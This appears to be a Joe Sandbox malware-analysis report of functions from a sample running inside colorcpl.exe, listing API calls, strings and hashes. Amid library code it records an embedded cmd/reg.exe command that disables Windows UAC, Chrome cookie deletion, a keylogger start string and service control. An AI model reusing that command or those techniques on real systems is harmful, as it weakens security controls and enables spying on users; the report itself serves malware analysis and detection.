                                        • API String ID: 776569668-0
                                        • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                        • Instruction ID: 8aafd7964e0e2b992d74710a8d1679877bfddcfd2a8c0c05a131f1077cb583a7
                                        • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                        • Instruction Fuzzy Hash: BF112171544B08FAE9A0BBB0CE49FCB779CAF14714F40883EA69E66450DA75B6144750
                                        Function 0691EE9F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                        • Instruction ID: 6d9bfee4b807adb596bff3dd5817b557a09a618c81a852253adee15a0ce81f89
                                        • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                        • Instruction Fuzzy Hash: 09115171988B0CAAD6F0FBB1CE05FCB7BDD5F84710F500925B6BA6E850DA65F5048650
                                        Function 04AB80FA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,04AB80F1,04AB705E), ref: 04AB8108
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04AB8116
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04AB812F
                                        • SetLastError.KERNEL32(00000000,?,04AB80F1,04AB705E), ref: 04AB8181
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: 44e7bc33812a07f902a722d8b5f3dad62720d3a0cc290b482cec34f374034ae6
                                        • Instruction ID: 865e940660db5245c3fd389a31117cecdfb3745a06693ffc77aa6fa64bae87ee
                                        • Opcode Fuzzy Hash: 44e7bc33812a07f902a722d8b5f3dad62720d3a0cc290b482cec34f374034ae6
                                        • Instruction Fuzzy Hash: 5F01B13224B3116EB7143E7D7C84A9B3A6CEB55778B20432DE5A4586D2EF2A7C025280
                                        Function 04A8A9E2 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 04A8AA1E
                                        • GetLastError.KERNEL32 ref: 04A8AA28
                                        Strings
                                        • [Chrome Cookies not found], xrefs: 04A8AA42
                                        • [Chrome Cookies found, cleared!], xrefs: 04A8AA4E
                                        • UserProfile, xrefs: 04A8A9EE
                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 04A8A9E9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteErrorFileLast
                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                        • API String ID: 2018770650-304995407
                                        • Opcode ID: ab22a391d72fcd55a3a6285fe95ce807a79031d72051a045c6d0a53031c01630
                                        • Instruction ID: 3e5068f6ef5c7b035c7346ff5334a3435de2f3343d2d0756e04c51df0cffbb40
                                        • Opcode Fuzzy Hash: ab22a391d72fcd55a3a6285fe95ce807a79031d72051a045c6d0a53031c01630
                                        • Instruction Fuzzy Hash: C501D171A41008ABAB047BB5DE678BFB728FB61508B80055EE81257690FE12BD16CBD1
                                        Function 04A98D76 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 04A98DA8
                                        • PlaySoundW.WINMM(00000000,00000000), ref: 04A98DB6
                                        • Sleep.KERNEL32(00002710), ref: 04A98DBD
                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 04A98DC6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                        • String ID: Alarm triggered$`#v
                                        • API String ID: 614609389-3049340936
                                        • Opcode ID: 0510a7c58c78e7395818e452cffef802064e02c1f22af0b8b85bba264805efa9
                                        • Instruction ID: 3b272475693d66db6d40c3c3e356f7960a332363b63c9bc30ba3b60f3f44e8d5
                                        • Opcode Fuzzy Hash: 0510a7c58c78e7395818e452cffef802064e02c1f22af0b8b85bba264805efa9
                                        • Instruction Fuzzy Hash: 79E01A66A411607BBA1037AA6E0FC3F2E6DEBD2A61701009EF90A5A144D9552C028AF2
                                        Function 0691230D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID: pF
                                        • API String ID: 269201875-2973420481
                                        • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                        • Instruction ID: 8b32d1faf40f7e9f88c375647bb760112b9c4aa740f2fac8e2522575c3ca1749
                                        • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                        • Instruction Fuzzy Hash: 3FF030BA8051248BC782EF55BD404143FE4BB08B34B261536F9B8EEA70F7B105468F8E
                                        Function 04AB887C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                        Download Yara Rule
                                        APIs
                                        • __allrem.LIBCMT ref: 04AB8A09
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04AB8A25
                                        • __allrem.LIBCMT ref: 04AB8A3C
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04AB8A5A
                                        • __allrem.LIBCMT ref: 04AB8A71
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04AB8A8F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                        • Instruction ID: 304b9d40cf2936835814349f6b7317ba6cad5e94920efa42d825a2685f5a4ff2
                                        • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                        • Instruction Fuzzy Hash: 8281E472600706ABEB24BF6CCD40BEA73ACAF44768F14452EE595D6682E778F90087D0
                                        Function 06909641 Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                        Download Yara Rule
                                        APIs
                                        • __allrem.LIBCMT ref: 069097CE
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 069097EA
                                        • __allrem.LIBCMT ref: 06909801
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0690981F
                                        • __allrem.LIBCMT ref: 06909836
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 06909854
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                        • Instruction ID: 0302034ed37774d136b7aee943a3c221875ed099783b355c2eacc9f6d802cbac
                                        • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                        • Instruction Fuzzy Hash: 0581E972E007069FF7A4DE68CC40BAA73AD9F80764F34552AE521DBAC1EB75D9408B90
                                        Function 04AC2E0B Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __cftoe
                                        • String ID:
                                        • API String ID: 4189289331-0
                                        • Opcode ID: 5cbdf4f4ee6b8492bc1050fa470959f33c7f490e1b96f59a140e7af61609c41c
                                        • Instruction ID: 50e7a03542ec3e83b323b847ce7fcc1f0cf212e0aaadd7b7e1facd43a97028d8
                                        • Opcode Fuzzy Hash: 5cbdf4f4ee6b8492bc1050fa470959f33c7f490e1b96f59a140e7af61609c41c
                                        • Instruction Fuzzy Hash: 0A51FB33D00209EBEF65AF688D44FAE7BA8AF48334F10429DE815A61C1EB31F55086A4
                                        Function 06913BD0 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __cftoe
                                        • String ID:
                                        • API String ID: 4189289331-0
                                        • Opcode ID: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                        • Instruction ID: 487a79211df791033b5ce0fcc4f7e2132daffa5421c54880f0cb9d4def4ab3fe
                                        • Opcode Fuzzy Hash: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                        • Instruction Fuzzy Hash: 8851EB76D0020DABEFE49B688C44EAD77BDEF89730F34421AF8299E981DB31C500C664
                                        Function 04AC4A81 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __freea$__alloca_probe_16_free
                                        • String ID: a/p$am/pm
                                        • API String ID: 2936374016-3206640213
                                        • Opcode ID: fa266bc5a4e9b2f4a7aca99f1c6d6cab829aa780d45841e64fd666f8f7516dd9
                                        • Instruction ID: 1dfbd4a26d51c2fe23abd80d797965854562bd57981c316dfbd6e8a414abb3dc
                                        • Opcode Fuzzy Hash: fa266bc5a4e9b2f4a7aca99f1c6d6cab829aa780d45841e64fd666f8f7516dd9
                                        • Instruction Fuzzy Hash: 45D12831A04215DBDBA99F68CA74BFABBB1FF0D300F15425EE905AB250E735B940CB58
                                        Function 04A8F8B7 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 04A8F8C4
                                        • int.LIBCPMT ref: 04A8F8D7
                                          • Part of subcall function 04A8CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 04A8CAFA
                                          • Part of subcall function 04A8CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 04A8CB14
                                        • std::_Facet_Register.LIBCPMT ref: 04A8F917
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 04A8F920
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 04A8F93E
                                        • __Init_thread_footer.LIBCMT ref: 04A8F97F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                        • String ID:
                                        • API String ID: 3815856325-0
                                        • Opcode ID: a9ec66a17d0dd05923ab1d5d6ed307d275a43f026824a22e83191effa8bd7407
                                        • Instruction ID: 37caf912bf786a8a4e8d7da0864b87914e2d58f119ddaf7995880fc6715fcc7b
                                        • Opcode Fuzzy Hash: a9ec66a17d0dd05923ab1d5d6ed307d275a43f026824a22e83191effa8bd7407
                                        • Instruction Fuzzy Hash: 2921F632900114BFEB14FBE8DA449DD776CDF44228B60019EFA51AB291DF35BE418BE0
                                        Function 068E067C Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 068E0689
                                        • int.LIBCPMT ref: 068E069C
                                          • Part of subcall function 068DD8AE: std::_Lockit::_Lockit.LIBCPMT ref: 068DD8BF
                                          • Part of subcall function 068DD8AE: std::_Lockit::~_Lockit.LIBCPMT ref: 068DD8D9
                                        • std::_Facet_Register.LIBCPMT ref: 068E06DC
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 068E06E5
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 068E0703
                                        • __Init_thread_footer.LIBCMT ref: 068E0744
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                        • String ID:
                                        • API String ID: 3815856325-0
                                        • Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                        • Instruction ID: c31ab466faee4b7854b788c5525f86eebbff5fee0b62a40c4d26267c60966b0d
                                        • Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                        • Instruction Fuzzy Hash: 35213B32900214AFCBD0FBACDC559AD37789F81620F204566E654EB6D0DF749E418BD5
                                        Function 04AC5725 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,00000000,04ABF143,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC5729
                                        • _free.LIBCMT ref: 04AC575C
                                        • _free.LIBCMT ref: 04AC5784
                                        • SetLastError.KERNEL32(00000000,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC5791
                                        • SetLastError.KERNEL32(00000000,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC579D
                                        • _abort.LIBCMT ref: 04AC57A3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: 7bcc092bf72ba6a885af4ddda34d6d2cc918f5bc664356bdf9308879071b5750
                                        • Instruction ID: 8d19eaa36c5b54c5cc01c29334ac3058af386f768206bbd5bfd3092177c553a9
                                        • Opcode Fuzzy Hash: 7bcc092bf72ba6a885af4ddda34d6d2cc918f5bc664356bdf9308879071b5750
                                        • Instruction Fuzzy Hash: F3F0F971985720BBE7C237356D48B2F1A29DBD1628F25841CF81AD6180EF29B8824B24
                                        Function 04A98A5C Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,04A985D9,00000000), ref: 04A98A6B
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,04A985D9,00000000), ref: 04A98A7F
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A985D9,00000000), ref: 04A98A8C
                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,04A985D9,00000000), ref: 04A98A9B
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A985D9,00000000), ref: 04A98AAD
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A985D9,00000000), ref: 04A98AB0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: efbd07936bdc5f64e338f2b49941d197b6f6fc1c3104b71e4d8d8b77fc6d4280
                                        • Instruction ID: 4b3d32d5df55bdfb4ecdef67ff32c137c5dba8a9b4d2fa6bc5ac21973f2209ac
                                        • Opcode Fuzzy Hash: efbd07936bdc5f64e338f2b49941d197b6f6fc1c3104b71e4d8d8b77fc6d4280
                                        • Instruction Fuzzy Hash: C2F0F0316022187BE710BBA4AC89EBF3BACDF46250F40401AF90AC3140EF2C9D4786F0
                                        Function 04A98BC7 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,04A984D9,00000000), ref: 04A98BD6
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,04A984D9,00000000), ref: 04A98BEA
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A984D9,00000000), ref: 04A98BF7
                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,04A984D9,00000000), ref: 04A98C06
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A984D9,00000000), ref: 04A98C18
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A984D9,00000000), ref: 04A98C1B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: 7b56d70938106940bcb02279fb4708c61a49df06ea24545c7a4d803d9bff9120
                                        • Instruction ID: efcd61fd4ec1cf03efee03945e124371f3ffe89cb520db2783241106d7f0bcd2
                                        • Opcode Fuzzy Hash: 7b56d70938106940bcb02279fb4708c61a49df06ea24545c7a4d803d9bff9120
                                        • Instruction Fuzzy Hash: 31F062715421186BE611BB64AC89DBF3BACDB55650B00401AFA0AD6140DF2C9E4695A1
                                        Function 04A98B60 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,04A98559,00000000), ref: 04A98B6F
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,04A98559,00000000), ref: 04A98B83
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A98559,00000000), ref: 04A98B90
                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,04A98559,00000000), ref: 04A98B9F
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A98559,00000000), ref: 04A98BB1
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A98559,00000000), ref: 04A98BB4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: 1fca833243b88c6cf1415e48e71b32216bf4095da28ce0cb76ec9314e995e111
                                        • Instruction ID: 850f8ea475f820477aa6b2275238afc2cf3c76311c8c73e34073227889705ba2
                                        • Opcode Fuzzy Hash: 1fca833243b88c6cf1415e48e71b32216bf4095da28ce0cb76ec9314e995e111
                                        • Instruction Fuzzy Hash: B9F0CDB16422186BE610BBA4AC49EBF3BACDB56250B00405AFA0AD2140DF2C9D0686A0
                                        Function 04A98A00 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,04A98656,00000000), ref: 04A98A09
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,04A98656,00000000), ref: 04A98A1E
                                        • CloseServiceHandle.ADVAPI32(00000000,?,04A98656,00000000), ref: 04A98A2B
                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,04A98656,00000000), ref: 04A98A36
                                        • CloseServiceHandle.ADVAPI32(00000000,?,04A98656,00000000), ref: 04A98A48
                                        • CloseServiceHandle.ADVAPI32(00000000,?,04A98656,00000000), ref: 04A98A4B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                        • String ID:
                                        • API String ID: 276877138-0
                                        • Opcode ID: 3037132e060e177ee345a901459805b9eb32b1d9aaff870f459caecfa0a9ed86
                                        • Instruction ID: f6b914dd51a46c5f316c1870254a5be892a9ad1c42debc9f50bf151347a4f75d
                                        • Opcode Fuzzy Hash: 3037132e060e177ee345a901459805b9eb32b1d9aaff870f459caecfa0a9ed86
                                        • Instruction Fuzzy Hash: ABF0A7B11121256FF611BB74AC88DBF2BECDF95695B01041EF402D3140DF6C9D4BA5B1
                                        Function 04A8A0B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 04A8A0BE
                                        • wsprintfW.USER32 ref: 04A8A13F
                                          • Part of subcall function 04A8962E: SetEvent.KERNEL32(?,?,00000000,04A8A156,00000000), ref: 04A8965A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EventLocalTimewsprintf
                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                        • API String ID: 1497725170-248792730
                                        • Opcode ID: 71fc630ac5a95c069723840432ea9fa328cc81ecca783b3053978f2e3d80db73
                                        • Instruction ID: 7a0388959bf2d61955a7412a8a3aa74e4cadb59f0cd0c76736b83e39be2843c9
                                        • Opcode Fuzzy Hash: 71fc630ac5a95c069723840432ea9fa328cc81ecca783b3053978f2e3d80db73
                                        • Instruction Fuzzy Hash: D1115EB2504018AAEB08FBA5ED50CFF77BCEF58214B00012EF90666180EF787A47C6A4
                                        Function 04A9B2C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegisterClassExA.USER32(00000030), ref: 04A9B310
                                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 04A9B32B
                                        • GetLastError.KERNEL32 ref: 04A9B335
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ClassCreateErrorLastRegisterWindow
                                        • String ID: 0$MsgWindowClass
                                        • API String ID: 2877667751-2410386613
                                        • Opcode ID: 33b187710a43839d6bd7317d1d876956728a8727a0583b7e69fa3c483c1652cf
                                        • Instruction ID: e8696fba97ae23e33bf4d2b58d9fc58c14942fb72a0b3444ca4fae8680dd6698
                                        • Opcode Fuzzy Hash: 33b187710a43839d6bd7317d1d876956728a8727a0583b7e69fa3c483c1652cf
                                        • Instruction Fuzzy Hash: C1011EB1D0121DAFDB11DFE9EC849EFBBBCFB08354F40052AF911A6240EB7569058BA0
                                        Function 04A8E501 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,04AF1FFC), ref: 04A8E547
                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,04AF1FFC), ref: 04A8E556
                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,04AF1FFC), ref: 04A8E55B
                                        Strings
                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 04A8E53D
                                        • C:\Windows\System32\cmd.exe, xrefs: 04A8E542
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CreateProcess
                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                        • API String ID: 2922976086-4183131282
                                        • Opcode ID: 3d64b3144f3bcfece021476a8c3fb022f45ba589d0ab96ab933b92ecfe8a699b
                                        • Instruction ID: a2a365cf66de26f3119e4d6d9292ec60c78c9c356791c449bded7b90c9b7f02f
                                        • Opcode Fuzzy Hash: 3d64b3144f3bcfece021476a8c3fb022f45ba589d0ab96ab933b92ecfe8a699b
                                        • Instruction Fuzzy Hash: 67F09076D012AC7ADB20AAE7AC0DEDF7F3CEBCAF10F00015ABA14A6004D6756400CAF0
                                        Function 04AC083A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,04AC07EB,00000003,?,04AC078B,00000003,04AEB4F8,0000000C,04AC08E2,00000003,00000002), ref: 04AC085A
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 04AC086D
